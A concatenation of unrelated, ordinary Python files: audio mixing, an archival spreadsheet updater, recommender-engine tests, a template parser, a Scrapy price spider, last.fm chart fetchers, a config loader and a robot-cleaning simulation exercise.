def Copy(cls, signal):
"""Makes a copy os a signal.
Args:
signal: AudioSegment instance.
Returns:
An AudioSegment instance.
"""
return pydub.AudioSegment(
data=signal.get_array_of_samples(),
metadata={
'sample_width': signal.sample_width,
'frame_rate': signal.frame_rate,
'frame_width': signal.frame_width,
'channels': signal.channels,
})
@classmethod
def MixSignals(cls, signal, noise, target_snr=0.0, bln_pad_shortest=False):
"""Mixes two signals with a target SNR.
Mix two signals with a desired SNR by scaling noise (noise).
If the target SNR is +/- infinite, a copy of signal/noise is returned.
Args:
signal: AudioSegment instance (signal).
noise: AudioSegment instance (noise).
target_snr: float, numpy.Inf or -numpy.Inf (dB).
bln_pad_shortest: if True, it pads the shortest signal with silence at the
end.
Returns:
An AudioSegment instance.
"""
# Handle infinite target SNR.
if target_snr == -np.Inf:
# Return a copy of noise.
logging.warning('SNR = -Inf, returning noise')
return cls.Copy(noise)
elif target_snr == np.Inf:
# Return a copy of signal.
logging.warning('SNR = +Inf, returning signal')
return cls.Copy(signal)
# Check signal and noise power.
signal_power = float(signal.dBFS)
noise_power = float(noise.dBFS)
if signal_power == -np.Inf:
logging.error('signal has -Inf power, cannot mix')
raise exceptions.SignalProcessingException(
'cannot mix a signal with -Inf power')
if noise_power == -np.Inf:
logging.error('noise has -Inf power, cannot mix')
raise exceptions.SignalProcessingException(
'cannot mix a signal with -Inf power')
# Pad signal (if necessary). If noise is the shortest, the AudioSegment
# overlay() method implictly pads noise. Hence, the only case to handle
# is signal shorter than noise and bln_pad_shortest True.
if bln_pad_shortest:
signal_duration = len(signal)
noise_duration = len(noise)
logging.warning('mix signals with padding')
logging.warning(' signal: %d ms', signal_duration)
logging.warning(' noise: %d ms', noise_duration)
padding_duration = noise_duration - signal_duration
if padding_duration > 0: # That is signal_duration < noise_duration.
logging.debug(' padding: %d ms', padding_duration)
padding = pydub.AudioSegment.silent(
duration=padding_duration,
frame_rate=signal.frame_rate)
logging.debug(' signal (pre): %d ms', len(signal))
signal = signal + padding
logging.debug(' signal (post): %d ms', len(signal))
# Update power.
signal_power = float(signal.dBFS)
# Mix signals using the target SNR.
gain_db = signal_power - noise_power - target_snr
return cls.Normalize(signal.overlay(noise.apply_gain(gain_db)))
|
<filename>updateASpace.py
import os
import csv
import openpyxl
import argparse
argParse = argparse.ArgumentParser()
argParse.add_argument("package", help="Package ID in Processing directory.")
argParse.add_argument("-f", "--file", help="File name of spreadsheet to be updated. If no files are listed, all will be updated.", default=None)
args = argParse.parse_args()
if os.name == 'nt':
processingDir = "\\\\Romeo\\SPE\\processing"
else:
processingDir = "/media/SPE/processing"
colID = args.package.split("_")[0].split("-")[0]
package = os.path.join(processingDir, colID, args.package)
derivatives = os.path.join(package, "derivatives")
masters = os.path.join(package, "masters")
metadata = os.path.join(package, "metadata")
if not os.path.isdir(package) or not os.path.isdir(derivatives) or not os.path.isdir(metadata):
raise ("ERROR: " + package + " is not a valid package.")
hyraxImport = os.path.join(metadata, args.package + ".tsv")
if not os.path.isfile(hyraxImport):
raise ("ERROR: " + hyraxImport + " is not a valid hryax import TSV.")
for sheetFile in os.listdir(metadata):
if sheetFile.lower().endswith(".xlsx"):
if not args.file or args.file.lower() == sheetFile.lower():
print ("Reading sheet: " + sheetFile)
sheetPath = os.path.join(metadata, sheetFile)
wb = openpyxl.load_workbook(filename=sheetPath, read_only=False)
#validate sheets
for sheet in wb.worksheets:
checkSwitch = True
try:
if sheet["H1"].value.lower().strip() != "title":
checkSwitch = False
elif sheet["H2"].value.lower().strip() != "level":
checkSwitch = False
elif sheet["H3"].value.lower().strip() != "ref id":
checkSwitch = False
elif sheet["J6"].value.lower().strip() != "date 1 display":
checkSwitch = False
elif sheet["D6"].value.lower().strip() != "container uri":
checkSwitch = False
except:
print ("ERROR: incorrect sheet " + sheet.title + " in file " + sheetPath)
if checkSwitch == False:
print ("ERROR: incorrect sheet " + sheet.title + " in file " + sheetPath)
else:
rowCount = 0
for row in sheet.rows:
rowCount = rowCount + 1
if rowCount > 6:
if not row[22].value is None:
if "|" in row[22].value:
daoPath = row[22].value.split("|")[0]
else:
daoPath = row[22].value
filePathDerivatives = os.path.join(derivatives, daoPath)
filePathMasters = os.path.join(masters, daoPath)
if os.path.isfile(filePathDerivatives):
filePath = filePathDerivatives
else:
filePath = filePathMasters
if os.path.isfile(filePath):
refID = row[0].value
match = False
file = open(hyraxImport, "r")
reader = csv.reader(file, delimiter='\t')
for line in reader:
if line[1].startswith("daos/"):
if line[7] == refID:
print ("Updating " + str(row[22].value) + " to " + str(line[1]))
row[22].value = "https://archives.albany.edu/concern/" + line[1]
match = True
file.close()
if match == False:
print ("ERROR: failed to find matching refID " + refID + " in hyrax upload file " + hyraxImport)
wb.save(filename=os.path.join(metadata, "updated_" + sheetFile)) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 2020, <NAME>
import multiprocessing as mp
import unittest
from typing import Iterable
import numpy as np
import pandas as pd
from ..core.computation import Engine
class EngineTest(unittest.TestCase):
"""
Tests `computation.Engine` class.
"""
def setUp(self) -> None:
"""
Sets up the tests.
"""
self._engine = Engine(random_state=0)
def test_initialize_factors(self) -> None:
"""
Tests that `Engine._initialize_factors` produce factor
matrices `X` and `Y` with random values in correct shape.
"""
test_m, test_n = (15, 25)
X_expected, Y_expected = self._engine._initialize_factors(test_m, test_n)
for expected, size in ((X_expected, test_m), (Y_expected, test_n)):
self.assertTupleEqual((size, self._engine._n_factors), expected.shape)
def test_feedback_1d_generator(self) -> None:
"""
Tests that `Engine._feedback_1d_generator` produces correct
row/column arrays from `R` based on the `axis` argument.
"""
def assert_collection_of_numpy_equal(
x: Iterable[np.array], y: Iterable[np.array]
) -> None:
"""
Asserts that collections `x` and `y` containing
numpy arrays are identical.
"""
x, y = list(x), list(y)
assert len(x) == len(x)
for array_x, array_y in zip(x, y):
np.testing.assert_array_equal(array_x, array_y)
test_R = pd.DataFrame({"A": [1, 3], "B": [6, 7]})
tests = (
([np.array([1, 3]), np.array([6, 7])], 0),
([np.array([1, 6]), np.array([3, 7])], 1),
)
for expected, axis in tests:
result = list(self._engine._feedback_1d_generator(test_R, axis))
assert_collection_of_numpy_equal(result, expected)
def test_compute_factors_1d(self) -> None:
"""
Tests that `Engine._compute_factors` computes correct
factor row for one user/item.
"""
np.random.seed(0)
test_feedback_1d = np.array([5, 4, 0, 0, 0, 4, 0, 0, 0, 0])
test_other_factors = np.random.rand(10, 5)
test_other_factors_small = np.dot(test_other_factors.T, test_other_factors)
result = self._engine._compute_factors_1d(
feedback_1d=test_feedback_1d,
other_factors=test_other_factors,
other_factors_small=test_other_factors_small,
reg_lambda=1,
alpha=40,
)
expected = np.array([0.2940538, 0.52162197, 0.82403064, -0.2290155, 0.17128187])
np.testing.assert_array_almost_equal(result, expected, decimal=7)
def test_compute_factors(self) -> None:
"""
Tests that `Engine._compute_factors` computes
correct factor rows for every user/item.
"""
np.random.seed(0)
R_test = pd.DataFrame(
[
[3, 2, 0, 0, 0, 0, 0, 0, 1, 2],
[0, 2, 3, 0, 0, 0, 0, 2, 3, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 2],
[0, 1, 0, 2, 2, 0, 0, 0, 2, 2],
[1, 0, 0, 0, 2, 0, 3, 0, 0, 0],
[1, 0, 0, 0, 2, 3, 0, 3, 0, 0],
[0, 0, 3, 0, 2, 0, 0, 0, 0, 0],
[0, 0, 1, 3, 3, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
]
)
test_n = R_test.shape[-1]
# axis=1 test for user factors, other_factors matrix is for items
test_axis = 1
test_other_factors = np.random.rand(test_n, 3)
pool = mp.Pool(1)
try:
result = self._engine._compute_factors(
pool=pool, R=R_test, other_factors=test_other_factors, axis=test_axis
)
finally:
pool.close()
# shape (9, 3): 3 factors for 9 users
expected = np.array(
[
[0.35764017, 1.03013196, 0.27789359],
[1.21552231, 1.36885415, -0.71711505],
[1.5414733, -0.52604296, -0.47427519],
[0.24321584, 1.0214088, 0.40020838],
[0.04003445, 1.06238047, 0.06082416],
[-0.51951887, 1.15240956, 1.12119426],
[-0.79891536, 1.55973535, -0.05766712],
[-1.09061448, 1.76283214, -0.04719709],
[0.27658886, 0.94346013, -0.90276183],
]
)
np.testing.assert_array_almost_equal(result, expected, decimal=7)
@staticmethod
def test_predict() -> None:
"""
Tests that `Engine.predict` computes correct
recommendation for given `user`.
"""
engine = Engine()
engine._X = np.array([[0.50, 0.90, 0.30], [0.05, 0.94, 0.81]])
engine._Y = np.array(
[[0.20, 0.12, 0.80], [0.50, 0.97, 0.03], [0.75, 0.02, 0.15]]
)
# user 20 likes factors 1 and 2
# item 4 really belongs to genre 1 and item 3 belongs to genre 2
# these two items will be recommended
#
# user 20 doesnt care about factor 0 where item 5 belongs
# small recommendation for item 5
engine._user_index = pd.Index([10, 20], name="user_id")
engine._item_index = pd.Index([3, 4, 5], name="item_id")
result = engine.predict(user=20)
result_top_2 = engine.predict(user=20, top_n=2)
expected = pd.Series(
[0.7708, 0.9611, 0.1778], index=engine._item_index, name=20
)
# calling .nlargest on series will sort the values (descending)
expected_top_2 = expected[[True, True, False]].sort_values(ascending=False)
pd.testing.assert_series_equal(result, expected)
pd.testing.assert_series_equal(result_top_2, expected_top_2)
def test_get_loss(self) -> None:
"""
Tests that `Engine._get_loss` computes correct least squares loss.
"""
R_test = np.array([[1, 0, 0, 4], [2, 1, 0, 0], [0, 0, 0, 1]])
X_test = np.array([[0.3, 0.1], [0.9, 0.4], [0.1, 0.5]])
Y_test = np.array([[0.4, 0.1], [0.9, 0.5], [0.9, 0.9], [0.6, 0.5]])
result = self._engine._get_loss(X_test, Y_test, R_test)
expected = 177.73779
self.assertAlmostEqual(result, expected, places=4)
if __name__ == "__main__":
unittest.main()
|
import re
class Blocks:
def __init__(self):
self.errors = []
self.blocks = {} # block format: { blockname : [blocktype,blockcontent,bconditional] }
self.cblock = '' # current block name
self.order = [] # keep the blockname indexes of self.blocks in order processed here
# return True if open tag found, False otherwise
def __parseOpen(self,line):
m = re.split('{%',line,1)
if len(m) > 1:
# found open tag, grab btype & bname, send the rest to parseClose
tm = re.split(':',m[1],2)
btype = ''
bname = ''
bcond = None
therest = ''
# btype:bname:bcond extra
if len(tm) > 2:
btype = tm[0]
bname = tm[1]
nm = re.split('\s',tm[2],1)
if len(nm) > 1:
bcond = nm[0]
therest = nm[1]
else:
bcond = nm[0]
# btype:bname extra
elif len(tm) > 1:
btype = tm[0]
nm = re.split('\s',tm[1],1)
if len(nm) > 1:
bname = nm[0]
therest = nm[1]
else:
bname = nm[0]
# error
else:
self.errors.append('incorrect open tag on line ' + str(self.lncnt) + ': the entire open tag must be on one line like, {%btype:bname or {%btype:bname:bcond')
return False
#
self.cblock = bname
self.__createBlock(bname,btype,bcond)
if len(therest) > 0:
return not self.__parseClose(therest)
else:
return True
else:
# ignore everything between %} {%
return False
# return True if close tag found, False otherwise
def __parseClose(self,line):
m = re.split(r'%}',line,1)
if len(m) > 1:
# found end tag, add line to block content, send the rest to parseOpen
self.__addToBlock(m[0])
return not self.__parseOpen(m[1])
else:
# did not find end tag, just add line to block content
self.__addToBlock(line)
return False
def __createBlock(self,bname,btype,bcond=None):
self.blocks[bname] = [btype,'',bcond]
self.order.append(bname)
def __addToBlock(self,line):
self.blocks[self.cblock][1] += line
def __parseQengine(self,lines):
bsearch = True
self.lncnt = 0
for line in lines:
self.lncnt += 1
if bsearch:
bsearch = not self.__parseOpen(line)
else:
bsearch = self.__parseClose(line)
self.lncnt = 0
# checks step conditional, returns: step, step - 1 (conditional not met), step - 0.5 (conditional not met, but run grading in next step)
def checkStepConditional(self,data,step,qenginevars):
matches = re.findall('@@@@(.*)', data)
check = matches[step-1].split('.')
# either invalid conditional or no conditional, either way, continue to next step
if len(check) > 2:
return step
# check that conditional exists or not
if check[0] in qenginevars:
if check[1] in qenginevars[check[0]]:
return step
else:
pass
else:
pass
# if here, previous step must run, but check if we can grade in next step
tmp = Blocks()
tmp.parseString(data,step)
for key in tmp.blocks:
if tmp.blocks[key][0] == 'qans':
return step - 0.5
# if here, there is no 'qans' block in next step, so no grade will happen, just return previous step
return step - 1
# if there is an error in the open tag formatting,
# the entire block is just discarded,
# other well formatted blocks will be kept
def parseFile(self,file,step=0):
with open(file) as f:
lines = f.read().split('@@@@')[step].splitlines(True)
self.__parseQengine(lines)
def parseString(self,string,step=0):
lines = string.split('@@@@')[step].splitlines(True)
self.__parseQengine(lines)
def parseAllSteps(self,data):
blocks = data.split('@@@@')
for block in blocks:
lines = block.splitlines(True)
self.__parseQengine(lines)
def reset(self):
self.errors = []
self.blocks = {}
self.cblock = ''
self.order = []
|
<filename>portfolio/Python/scrapy/outillage/pixmania_spider.py
#!/usr/bin/python
# -*- coding: latin-1 -*-
import os
from scrapy import log
from scrapy.http import Request
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.utils.url import urljoin_rfc
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
URLS = {"http://www.pixmania.com/fr/fr/jardin/44/onglet.html": "Jardin",
"http://www.pixmania.com/fr/fr/bricolage/115/onglet.html": "Bricolage",
"http://www.pixmania.com/aspirateur-et-nettoyeur/frfr45_443_pm.html": "Aspirateur et nettoyeur",
"http://www.pixmania.com/arrosage/frfr44_2043_pm.html": "Arrosage",
"http://www.pixmania.com/outillage-a-main/frfr44_2042_pm.html": "Outillage à main",
"http://www.pixmania.com/outillage-motorise/frfr44_2041_pm.html": "Outillage motorisé"}
class PixmaniaSpider(BaseSpider):
name = "pixmania.com"
allowed_domains = ["pixmania.com"]
start_urls = URLS.keys()
def parse(self, response):
urls = URLS
hxs = HtmlXPathSelector(response)
links_div = hxs.select(u'//div[@class="box box-nav box-universe-nav" and strong[text()="'+ urls[response.url].decode('utf8')+'"]]'.decode('utf8'))
sites = links_div.select('ul/li[not(@class="highlight")]/a/@href')
for site in sites:
first_url = site.extract()
url = urljoin_rfc(first_url, '?sPageInfo=0', response.encoding)
yield Request(url, callback = self.parse_categories)
def parse_categories(self, response):
hxs = HtmlXPathSelector(response)
if hxs.select('//span[@class="nav-landmark"]/text()'):
total_pages = int(hxs.select('//span[@class="nav-landmark"]/text()').extract()[0].split()[-1])
for i in range(total_pages):
url = self._urljoin(response,'?sPageInfo=%s' % i)
yield Request(url, callback = self.parse_products)
else:
name = hxs.select('//div/div/div/div/div/h1/text()').extract()[0]
links_div = hxs.select(u'//div[@class="box box-nav box-universe-nav" and strong[text()="'+ name +'"]]'.decode('utf8'))
sites = links_div.select('ul/li[not(@class="highlight")]/a/@href')
for site in sites:
url = site.extract()
yield Request(url, callback = self.parse_categories)
def parse_products(self, response):
hxs = HtmlXPathSelector(response)
products = hxs.select('//*[@id="area-2"]//div[@class="grid-25"]')
if products:
for product in products:
loader = ProductLoader(item=Product(), selector=product)
loader.add_xpath('url', 'div/h3/a/@href')
if product.select('div/h3/a/abbr/@title'):
loader.add_xpath('name', 'div/h3/a/abbr/@title')
else:
loader.add_xpath('name','div/h3/a/text()')
price = product.select('div/div/p[@class="prd-amount"]/strong/text()').extract()[0]
loader.add_value('price', self._encode_price(price))
yield loader.load_item()
else:
products = hxs.select('//*[@id="area-2"]//tr[@class="prd first"]')
for product in products:
loader = ProductLoader(item=Product(), selector=product)
loader.add_xpath('url', 'td/h3/a/@href')
loader.add_xpath('name', 'td/h3/a/text()')
if product.select('td/p/strong/text()').extract():
price = product.select('td/p/strong/text()').extract()[0]
else:
if product.select('td/div/p/strong/text()').extract():
price = product.select('td/div/p/strong/text()').extract()[0]
loader.add_value('price', self._encode_price(price))
yield loader.load_item()
def _urljoin(self, response, url):
"""Helper to convert relative urls to absolute"""
return urljoin_rfc(response.url, url, response.encoding)
def _encode_price(self, price):
return price.replace(',','.').encode("ascii","ignore")
|
""" Contains functions to fetch API information from last.fm API."""
import logging
import youtube
import util.web
CHART_URL = 'http://lastfm-ajax-vip1.phx1.cbsig.net/kerve/charts?nr={0}&type=track&format=json'
TAG_SEARCH_URL = 'http://lastfm-ajax-vip1.phx1.cbsig.net/kerve/charts?nr={0}&type=track&f=tag:{1}&format=json'
LISTENING_NOW_URL = 'http://lastfm-ajax-vip1.phx1.cbsig.net/kerve/listeningnow?limit={0}&format=json'
log = logging.getLogger(__name__)
def chart(chart_items=5):
"""
Finds the currently most played tunes on last.fm and turns them in to a youtube list of tracks.
:param chart_items: int the amount of tracks we want.
:return: list[ dict{'type=youtube', 'video_id', 'int(video_time)', 'video_title'} ] or None on error.
"""
url = CHART_URL.format(chart_items)
lastfm = util.web.http_get(url=url, json=True)
log.debug('lastfm response %s' % lastfm)
if lastfm['json'] is not None:
if 'results' in lastfm['json']:
if 'track' in lastfm['json']['results']:
if len(lastfm['json']['results']['track']) is not 0:
# make this list unique
yt_tracks = []
for track in lastfm['json']['results']['track']:
search_str = '%s - %s' % (track['artist'], track['name'])
yt = youtube.search(search_str)
log.info(yt)
if yt is not None:
yt_tracks.append(yt)
return yt_tracks
return None
def tag_search(search_str, by_id=True, max_tunes=40):
"""
Search last.fm for tunes matching the search term and turns them in to a youtube list of tracks.
:param search_str: str the search term to search for.
:param by_id: bool if set to True, only tunes that have a youtube id will be added(recommended)
:param max_tunes: int the max amount of tunes to return.
:return: list[ dict{'type=youtube', 'video_id', 'int(video_time)', 'video_title'} ] or None on error.
"""
url = TAG_SEARCH_URL.format(max_tunes, util.web.quote(search_str))
lastfm = util.web.http_get(url=url, json=True)
log.debug('lastfm response %s' % lastfm)
if lastfm['json'] is not None:
if 'track' in lastfm['json']['results']:
if len(lastfm['json']['results']['track']) is not 0:
# make this list unique
yt_tracks = []
for track in lastfm['json']['results']['track']:
search_str = '%s - %s' % (track['artist'], track['name'])
if 'playlink' in track:
if 'data-youtube-id' in track['playlink']:
youtube_id = track['playlink']['data-youtube-id']
yt = youtube.video_details(youtube_id)
log.debug(yt)
if yt is not None:
yt_tracks.append(yt)
else:
if not by_id:
yt = youtube.search(search_str)
log.debug('search by search string: %s result: %s' % (search_str, yt))
if yt is not None:
yt_tracks.append(yt)
else:
if not by_id:
yt = youtube.search(search_str)
log.debug('search by search string: %s result: %s' % (search_str, yt))
if yt is not None:
yt_tracks.append(yt)
return yt_tracks
return None
def listening_now(max_tunes, by_id=True):
"""
Gets a list of tunes other people using last.fm are listening to, and turns them in to a youtube list of tracks.
:param max_tunes: int the amount of tracks we want.
:param by_id: bool if set to True, only tunes that have a youtube id will be added(recommended)
:return: list[ dict{'type=youtube', 'video_id', 'int(video_time)', 'video_title'} ] or None on error.
"""
url = LISTENING_NOW_URL.format(max_tunes)
lastfm = util.web.http_get(url=url, json=True)
log.debug('lastfm response %s' % lastfm)
if lastfm['json'] is not None:
if len(lastfm['json']['Users']) is not 0:
# make this list unique
yt_tracks = []
for user in lastfm['json']['Users']:
if 'playlink' in user:
if 'data-youtube-id' in user['playlink']:
youtube_id = user['playlink']['data-youtube-id']
yt = youtube.video_details(youtube_id)
log.debug(yt)
if yt is not None:
yt_tracks.append(yt)
else:
if 'Track' in user:
search_str = '%s - %s' % (user['Track']['Artist'], user['Track']['Name'])
if not by_id:
yt = youtube.search(search_str)
log.debug('search by search string: %s result: %s' % (search_str, yt))
if yt is not None:
yt_tracks.append(yt)
return yt_tracks
return None
|
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Basic configuration holder objects.
"""
import sys, os
import warnings
def execfile(fn, glbl, loc):
exec(open(fn).read(), glbl, loc)
class BasicConfigError(Exception):
pass
class ConfigLockError(BasicConfigError):
pass
class ConfigReadError(BasicConfigError):
pass
class ConfigHolder(dict):
"""Holds named configuration information.
For convenience, it maps attribute access to the real dictionary. This
object is lockable, use the 'lock' and 'unlock' methods to set its state. If
locked, new keys or attributes cannot be added, but existing ones may be
changed.
"""
def __init__(self, init={}, name=None):
name = name or self.__class__.__name__.lower()
dict.__init__(self, init)
dict.__setattr__(self, "_locked", 0)
dict.__setattr__(self, "_name", name)
def __getstate__(self):
return self.__dict__.items()
def __setstate__(self, items):
for key, val in items:
self.__dict__[key] = val
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, dict.__repr__(self))
def __str__(self):
n = self._name
s = ["{}(name={!r}):".format(self.__class__.__name__, n)]
s = s + [" {}.{} = {!r}".format(n, it[0], it[1]) for it in self.items()]
s.append("\n")
return "\n".join(s)
def __setitem__(self, key, value):
if self._locked and not key in self:
raise ConfigLockError("setting attribute on locked config holder")
return super(ConfigHolder, self).__setitem__(key, value)
def __getitem__(self, name):
return super(ConfigHolder, self).__getitem__(name)
def __delitem__(self, name):
return super(ConfigHolder, self).__delitem__(name)
__getattr__ = __getitem__
__setattr__ = __setitem__
def lock(self):
dict.__setattr__(self, "_locked", 1)
def unlock(self):
dict.__setattr__(self, "_locked", 0)
def islocked(self):
return self._locked
def copy(self):
ch = ConfigHolder(self)
if self.islocked():
ch.lock()
return ch
def add_section(self, name):
self.name = Section(name)
class Section(ConfigHolder):
def __init__(self, name):
super(Section, self).__init__(name=name)
def __repr__(self):
return super(Section, self).__str__()
class BasicConfig(ConfigHolder):
def mergefile(self, filename):
"""Merge in a Python syntax configuration file that should assign
global variables that become keys in the configuration. Returns
True if file read OK, False otherwise.
"""
if os.path.isfile(filename):
gb = {} # Temporary global namespace for config files.
gb["Section"] = Section
gb["sys"] = sys # In case config stuff needs these.
gb["os"] = os
def include(fname):
execfile(get_pathname(fname), gb, self)
gb["include"] = include
try:
execfile(filename, gb, self)
except:
ex, val, tb = sys.exc_info()
warnings.warn(
"BasicConfig: error reading {}: {} ({}).".format(
filename, ex, val))
return False
else:
return True
else:
return False
def get_pathname(basename):
basename = os.path.expandvars(os.path.expanduser(basename))
if basename.find(os.sep) < 0:
basename = os.path.join(os.sep, "etc", "pycopia", basename)
return basename
# main function for getting a configuration file. gets it from the common
# configuration location (/etc/pycopia), but if a full path is given then
# use that instead.
def get_config(fname, **kwargs):
fname = get_pathname(fname)
cf = BasicConfig()
cf.update(kwargs) # kwargs available to config file.
if cf.mergefile(fname):
cf.update(kwargs) # Again to override config settings
return cf
else:
raise ConfigReadError("did not successfully read {!r}.".format(fname))
def check_config(fname):
"""check_config(filename) -> bool
Check is a config file can be read without errors and contains
something.
"""
fname = get_pathname(fname)
cf = BasicConfig()
if cf.mergefile(fname):
return bool(cf)
else:
return False
def _test(argv):
cf = get_config("config_test.conf")
print (cf)
if __name__ == "__main__":
_test(sys.argv)
|
# Problem Set 6: Simulating robots
# Name:
# Collaborators:
# Time:
import math
import random
import ps6_visualize
import pylab
# === Provided classes
class Position(object):
"""
A Position represents a location in a two-dimensional room.
"""
def __init__(self, x, y):
"""
Initializes a position with coordinates (x, y).
"""
self.x = x
self.y = y
def getX(self):
return self.x
def getY(self):
return self.y
def getNewPosition(self, angle, speed):
"""
Computes and returns the new Position after a single clock-tick has
passed, with this object as the current position, and with the
specified angle and speed.
Does NOT test whether the returned position fits inside the room.
angle: float representing angle in degrees, 0 <= angle < 360
speed: positive float representing speed
Returns: a Position object representing the new position.
"""
old_x, old_y = self.getX(), self.getY()
# Compute the change in position
delta_y = speed * math.cos(math.radians(angle))
delta_x = speed * math.sin(math.radians(angle))
# Add that to the existing position
new_x = old_x + delta_x
new_y = old_y + delta_y
return Position(new_x, new_y)
# === Problems 1
class RectangularRoom(object):
"""
A RectangularRoom represents a rectangular region containing clean or dirty
tiles.
A room has a width and a height and contains (width * height) tiles. At any
particular time, each of these tiles is either clean or dirty.
"""
cleanTiles = [] # Using a dict to make sure I don't get duplicate tiles
def __init__(self, width, height):
"""
Initializes a rectangular room with the specified width and height.
Initially, no tiles in the room have been cleaned.
width: an integer > 0
height: an integer > 0
"""
self.width = width
self.height = height
def cleanTileAtPosition(self, pos):
"""
Mark the tile under the position POS as cleaned.
Assumes that POS represents a valid position inside this room.
pos: a Position
"""
x = pos.getX()
y = pos.getY()
if y >= self.height:
y -= 1
elif y <= 0:
y += 1
if x >= self.width:
x -= 1
elif x <= 0:
x += 1
self.cleanTiles.append((math.floor(x), math.floor(y)))
self.cleanTiles = list(set(self.cleanTiles))
def isTileCleaned(self, m, n):
"""
Return True if the tile (m, n) has been cleaned.
Assumes that (m, n) represents a valid tile inside the room.
m: an integer
n: an integer
returns: True if (m, n) is cleaned, False otherwise
"""
if (math.floor(m), math.floor(n)) in self.cleanTiles:
return True
return False
def getNumTiles(self):
"""
Return the total number of tiles in the room.
returns: an integer
"""
return self.width * self.height
def getNumCleanedTiles(self):
"""
Return the total number of clean tiles in the room.
returns: an integer
"""
return len(self.cleanTiles)
def getRandomPosition(self):
"""
Return a random position inside the room.
returns: a Position object.
"""
return Position(random.randrange(self.width), random.randrange(self.height))
def isPositionInRoom(self, pos):
"""
Return True if pos is inside the room.
pos: a Position object.
returns: True if pos is in the room, False otherwise.
"""
return 0 <= pos.getX() <= self.width and 0 <= pos.getY() <= self.height
class Robot(object):
"""
Represents a robot cleaning a particular room.
At all times the robot has a particular position and direction in the room.
The robot also has a fixed speed.
Subclasses of Robot should provide movement strategies by implementing
updatePositionAndClean(), which simulates a single time-step.
"""
# int(random.random()*360)
def __init__(self, room, speed):
"""
Initializes a Robot with the given speed in the specified room. The
robot initially has a random direction and a random position in the
room. The robot cleans the tile it is on.
room: a RectangularRoom object.
speed: a float (speed > 0)
"""
self.room = room
self.speed = speed
self.r_direction = random.randrange(0, 360)
self.r_position = self.room.getRandomPosition()
self.room.cleanTileAtPosition(self.r_position)
def getRobotPosition(self):
"""
Return the position of the robot.
returns: a Position object giving the robot's position.
"""
return self.r_position
def getRobotDirection(self):
"""
Return the direction of the robot.
returns: an integer d giving the direction of the robot as an angle in
degrees, 0 <= d < 360.
"""
return self.r_direction
def setRobotPosition(self, position):
"""
Set the position of the robot to POSITION.
position: a Position object.
"""
self.r_position = position
def setRobotDirection(self, direction):
"""
Set the direction of the robot to DIRECTION.
direction: integer representing an angle in degrees
"""
self.r_direction = direction
def updatePositionAndClean(self):
"""
Simulate the raise passage of a single time-step.
Move the robot to a new position and mark the tile it is on as having
been cleaned.
"""
raise NotImplementedError
# === Problem 2
class StandardRobot(Robot):
"""
A StandardRobot is a Robot with the standard movement strategy.
At each time-step, a StandardRobot attempts to move in its current direction; when
it hits a wall, it chooses a new direction randomly.
"""
# def positioning(self, x, y, speed, angle):
#
def updatePositionAndClean(self):
"""
Simulate the passage of a single time-step.
Move the robot to a new position and mark the tile it is on as having
been cleaned.
"""
# has room and speed in attributes of robot
speed = 0.0
speed_timer = 0.0
robot_position = None
while speed_timer < self.speed:
# print('speed incr of UPC', speed)
y = self.getRobotPosition().getY()
x = self.getRobotPosition().getX()
if self.room.isTileCleaned(int(x), int(y)) is False:
self.room.cleanTileAtPosition(self.r_position)
robot_position = Position(x, y)
robot_position = robot_position.getNewPosition(self.r_direction, speed)
# print('y', robot_position.getY())
# print('x', robot_position.getX())
speed += 0.01
speed_timer += 0.01
cy = robot_position.getY()
cx = robot_position.getX()
if cy <= 0:
self.setRobotPosition(Position(robot_position.getX(),0))
self.r_direction = random.randrange(360)
speed = 0.01
elif cy >= self.room.height:
self.setRobotPosition(Position(robot_position.getX(), self.room.height))
self.r_direction = random.randrange(360)
speed = 0.01
if cx <= 0:
self.setRobotPosition(Position(0, robot_position.getY()))
self.r_direction = random.randrange(360)
speed = 0.01
elif cx >= self.room.width:
self.setRobotPosition(Position(self.room.width, robot_position.getY()))
self.r_direction = random.randrange(360)
speed = 0.01
# print(type(robot_position))
self.setRobotPosition(robot_position)
# === Problem 3
def runSimulation(num_robots, speed, width, height, min_coverage, num_trials,
robot_type):
"""
Runs NUM_TRIALS trials of the simulation and returns the mean number of
time-steps needed to clean the fraction MIN_COVERAGE of the room.
The simulation is run with NUM_ROBOTS robots of type ROBOT_TYPE, each with
speed SPEED, in a room of dimensions WIDTH x HEIGHT.
num_robots: an int (num_robots > 0)
speed: a float (speed > 0)
width: an int (width > 0)
height: an int (height > 0)
min_coverage: a float (0 <= min_coverage <= 1.0)
num_trials: an int (num_trials > 0)
robot_type: class of robot to be instantiated (e.g. Robot or
RandomWalkRobot)
"""
visualize = False
total_time_steps = 0.0
for trial in range(num_trials):
if visualize:
anim = ps6_visualize.RobotVisualization(num_robots, width, height)
room = RectangularRoom(width, height)
robotCollection = []
for i in range(num_robots):
robotCollection.append(robot_type(room, speed))
if visualize:
anim.update(room, robotCollection)
while (room.getNumCleanedTiles() / float(room.getNumTiles())) < min_coverage:
for robot in robotCollection:
robot.updatePositionAndClean()
total_time_steps += 1
if visualize:
anim.update(room, robotCollection)
if visualize:
anim.done()
print(trial)
return total_time_steps / num_trials
class RandomWalkRobot(Robot):
"""
A RandomWalkRobot is a robot with the "random walk" movement strategy: it
chooses a new direction at random after each time-step.
"""
def updatePositionAndClean(self):
cur_pos = self.getRobotPosition()
cur_dir = self.getRobotDirection()
self.setRobotDirection(random.randrange(360))
new_pos = cur_pos.getNewPosition(cur_dir, self.speed)
if self.room.isPositionInRoom(new_pos):
self.setRobotPosition(new_pos)
self.room.cleanTileAtPosition(new_pos)
# speed = 0.0
# speed_timer = 0.0
# robot_position = None
# while speed_timer < self.speed:
# # print('speed incr of UPC', speed)
# y = self.getRobotPosition().getY()
# x = self.getRobotPosition().getX()
